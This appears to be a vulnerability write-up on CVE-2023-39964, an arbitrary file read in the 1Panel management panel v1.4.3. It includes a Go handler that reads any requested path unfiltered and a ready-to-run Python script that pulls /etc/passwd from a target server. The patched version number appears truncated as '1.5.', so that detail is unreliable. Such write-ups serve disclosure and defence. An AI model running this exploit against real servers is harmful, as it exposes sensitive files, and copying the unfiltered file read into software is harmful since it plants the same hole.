CVE-2023-39964 - 1Panel Arbitrary File Read Vulnerability in v1.4.3

1Panel is a popular open-source Linux server operation and maintenance management panel used to manage servers effectively. Unfortunately, a security vulnerability (CVE-2023-39964) has been discovered in version 1.4.3, which allows an attacker to read arbitrary important configuration files on the server. The vulnerability is due to insufficient parameter filtering in the api/v1/file.go file, ultimately leading to arbitrary file reads. This can have severe consequences as sensitive information from server configuration files can be exposed. In this post, we will dive deep into the details of this vulnerability, the code snippet responsible for it, and the exploit to carry out an attack.

Vulnerability Details

In the api/v1/file.go file, a function named LoadFromFile is used to read the file using the requested path parameter[path]. Due to the lack of proper request parameter filtering, attackers can exploit this vulnerability to read arbitrary files on the server. The exploit involves sending a request to the affected server, including a path to the target file, without being sanitized.

Code Snippet

In the below code snippet from file.go, we can observe that the function LoadFromFile reads the requested file without any proper parameter filtering:

package api

import (
   "github.com/gin-gonic/gin"
   "io/ioutil"
)

func LoadFromFile(c *gin.Context) {
   path := c.Query("path")
   content, err := ioutil.ReadFile(path)
   if err != nil {
      c.JSON(500, gin.H{"error": "File not found"})
      return
   }
   c.JSON(200, gin.H{"content": string(content)})
}

Below is an example of exploiting the vulnerability using a Python script

import requests

target = "http://target-server/";
file_to_read = "/etc/passwd"  # Change this to a target file

url = f"{target}api/v1/file?path={file_to_read}"
response = requests.get(url)
if response.status_code == 200:
    print("File content:")
    print(response.json()['content'])
else:
    print("Error reading the file")

Note that you will have to change target-server to the actual server address and file_to_read to the sensitive file you want to read.

Mitigation

The developers of the 1Panel management panel have released a patch in version 1.5. to fix this vulnerability. To secure your server, update your 1Panel instance to the latest version or, at minimum, version 1.5..

For more information regarding this vulnerability and the patch, please visit

1. 1Panel Official Website
2. 1Panel GitHub Repository

Conclusion

It is crucial to understand and mitigate the risks associated with software vulnerabilities. In the case of CVE-2023-39964, updating your 1Panel management panel to version 1.5. or higher can prevent this arbitrary file read vulnerability. Remember to keep your software up-to-date and apply security patches as they become available to protect your servers from potential attacks.

Timeline

Published on: 08/10/2023 18:15:00 UTC
Last modified on: 09/08/2023 16:56:00 UTC